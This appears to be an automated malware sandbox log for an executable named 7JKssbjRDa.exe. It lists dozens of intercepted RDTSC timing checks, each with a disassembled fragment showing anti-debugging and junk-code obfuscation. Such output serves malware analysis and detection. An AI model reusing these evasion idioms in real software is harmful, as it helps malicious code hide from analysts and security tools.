Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C8C5B second address: 9C8C61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C8C61 second address: 9C8C6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F68C0B5CAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C9861 second address: 9C9866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C9866 second address: 9C9870 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F68C0B5CAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9C9870 second address: 9C9939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d jo 00007F68C0520B59h 0x00000013 jmp 00007F68C0520B53h 0x00000018 pop ecx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F68C0520B48h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 push 00000000h 0x00000036 jmp 00007F68C0520B4Eh 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push esi 0x00000040 call 00007F68C0520B48h 0x00000045 pop esi 0x00000046 mov dword ptr [esp+04h], esi 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc esi 0x00000053 push esi 0x00000054 ret 0x00000055 pop esi 0x00000056 ret 0x00000057 call 00007F68C0520B4Bh 0x0000005c pushad 0x0000005d jmp 00007F68C0520B4Fh 0x00000062 mov edi, dword ptr [ebp+122D2D27h] 0x00000068 popad 0x00000069 pop esi 0x0000006a push eax 0x0000006b pushad 0x0000006c jmp 00007F68C0520B4Ch 0x00000071 push eax 0x00000072 push edx 0x00000073 js 00007F68C0520B46h 0x00000079 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CA067 second address: 9CA079 instructions: 0x00000000 rdtsc 0x00000002 je 00007F68C0B5CAE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CABD6 second address: 9CABE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F68C0520B46h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CA079 second address: 9CA07D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CA07D second address: 9CA086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D0065 second address: 9D0069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D154C second address: 9D157D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68C0520B54h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F68C0520B4Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9CC9E2 second address: 9CC9EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D157D second address: 9D1583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D15FC second address: 9D1600 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D1600 second address: 9D1606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D1606 second address: 9D1627 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jg 00007F68C0B5CAE6h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D33D0 second address: 9D33D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D33D4 second address: 9D33E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D33E4 second address: 9D345A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F68C0520B46h 0x00000009 jmp 00007F68C0520B58h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 xor bx, 7C94h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D1ED3h], ebx 0x0000001f push 00000000h 0x00000021 jng 00007F68C0520B52h 0x00000027 movzx edi, cx 0x0000002a xchg eax, esi 0x0000002b jmp 00007F68C0520B4Eh 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 jns 00007F68C0520B5Bh 0x00000039 jmp 00007F68C0520B55h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D43B1 second address: 9D43B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D4457 second address: 9D445B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D64B1 second address: 9D64B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D64B5 second address: 9D64BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D64BB second address: 9D64C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D568A second address: 9D568E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D568E second address: 9D569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D569C second address: 9D56A6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F68C0520B46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D6553 second address: 9D6557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D6557 second address: 9D655B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D674C second address: 9D6750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D74C4 second address: 9D7531 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F68C0520B48h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx ebx, ax 0x00000027 push 00000000h 0x00000029 add dword ptr [ebp+122D2B58h], ecx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F68C0520B48h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D1AE5h], esi 0x00000051 push eax 0x00000052 pushad 0x00000053 push edi 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 pop edi 0x00000057 pushad 0x00000058 jno 00007F68C0520B46h 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D773D second address: 9D7753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F68C0B5CAE6h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F68C0B5CAECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D9546 second address: 9D95C5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F68C0520B4Dh 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F68C0520B48h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a jmp 00007F68C0520B50h 0x0000002f call 00007F68C0520B4Ch 0x00000034 clc 0x00000035 pop edi 0x00000036 push 00000000h 0x00000038 jp 00007F68C0520B49h 0x0000003e mov bx, cx 0x00000041 xchg eax, esi 0x00000042 pushad 0x00000043 jmp 00007F68C0520B50h 0x00000048 push eax 0x00000049 push edx 0x0000004a jnp 00007F68C0520B46h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D95C5 second address: 9D95D5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DA66F second address: 9DA680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68C0520B4Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DB72D second address: 9DB755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d jc 00007F68C0B5CAE6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DC7A9 second address: 9DC7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jne 00007F68C0520B46h 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DC7BC second address: 9DC7C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DC7C2 second address: 9DC7C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DC7C6 second address: 9DC829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov bl, dl 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F68C0B5CAE8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000017h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a sbb di, 5F13h 0x0000002f push 00000000h 0x00000031 mov ebx, dword ptr [ebp+122D1EB0h] 0x00000037 sub ebx, dword ptr [ebp+122D1C39h] 0x0000003d xchg eax, esi 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F68C0B5CAF0h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DC829 second address: 9DC843 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DA851 second address: 9DA856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DA93A second address: 9DA93F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D882F second address: 9D8834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9D8834 second address: 9D884B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97EEAA second address: 97EEB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DB8F6 second address: 9DB8FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97EEB0 second address: 97EEB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DB8FC second address: 9DB912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0520B52h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97EEB4 second address: 97EEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DB912 second address: 9DB916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 97EEBA second address: 97EEC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DF178 second address: 9DF17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DF17D second address: 9DF215 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F68C0B5CAF8h 0x0000000d nop 0x0000000e mov edi, ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 or ebx, 4ABEEB84h 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F68C0B5CAE8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 0000001Dh 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov ebx, dword ptr [ebp+122D1CABh] 0x00000044 mov eax, dword ptr [ebp+122D1559h] 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F68C0B5CAE8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 and bl, 00000072h 0x00000067 push FFFFFFFFh 0x00000069 mov dword ptr [ebp+122D1C3Eh], esi 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DF215 second address: 9DF219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DF219 second address: 9DF223 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9DF223 second address: 9DF229 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9E106F second address: 9E1073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9E1073 second address: 9E108F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F68C0520B52h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9E13EB second address: 9E13F5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F68C0B5CAE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 98AB0A second address: 98AB41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0520B59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jmp 00007F68C0520B55h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 98AB41 second address: 98AB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 98AB4A second address: 98AB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 98AB50 second address: 98AB61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68C0B5CAEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9E849D second address: 9E84BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68C0520B59h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9E8932 second address: 9E8936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF392 second address: 9EF396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF43F second address: 9EF445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF445 second address: 9EF449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF449 second address: 9EF44D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF44D second address: 9EF45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF45B second address: 9EF462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF462 second address: 9EF469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF469 second address: 9EF48C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F68C0B5CAF4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF48C second address: 9EF499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F68C0520B4Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF499 second address: 9EF4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F68C0B5CAF7h 0x0000000f jmp 00007F68C0B5CAF1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF4B9 second address: 9EF4BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9EF4BF second address: 9EF4C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F42ED second address: 9F42F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F42F1 second address: 9F42F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F42F7 second address: 9F431A instructions: 0x00000000 rdtsc 0x00000002 js 00007F68C0520B5Dh 0x00000008 jmp 00007F68C0520B4Ch 0x0000000d jmp 00007F68C0520B4Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F431A second address: 9F4324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F68C0B5CAE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 9F4324 second address: 9F432A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\7JKssbjRDa.exe	RDTSC instruction interceptor: First address: 985A39 second address: 985A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnc 00007F68C0B5CAEEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
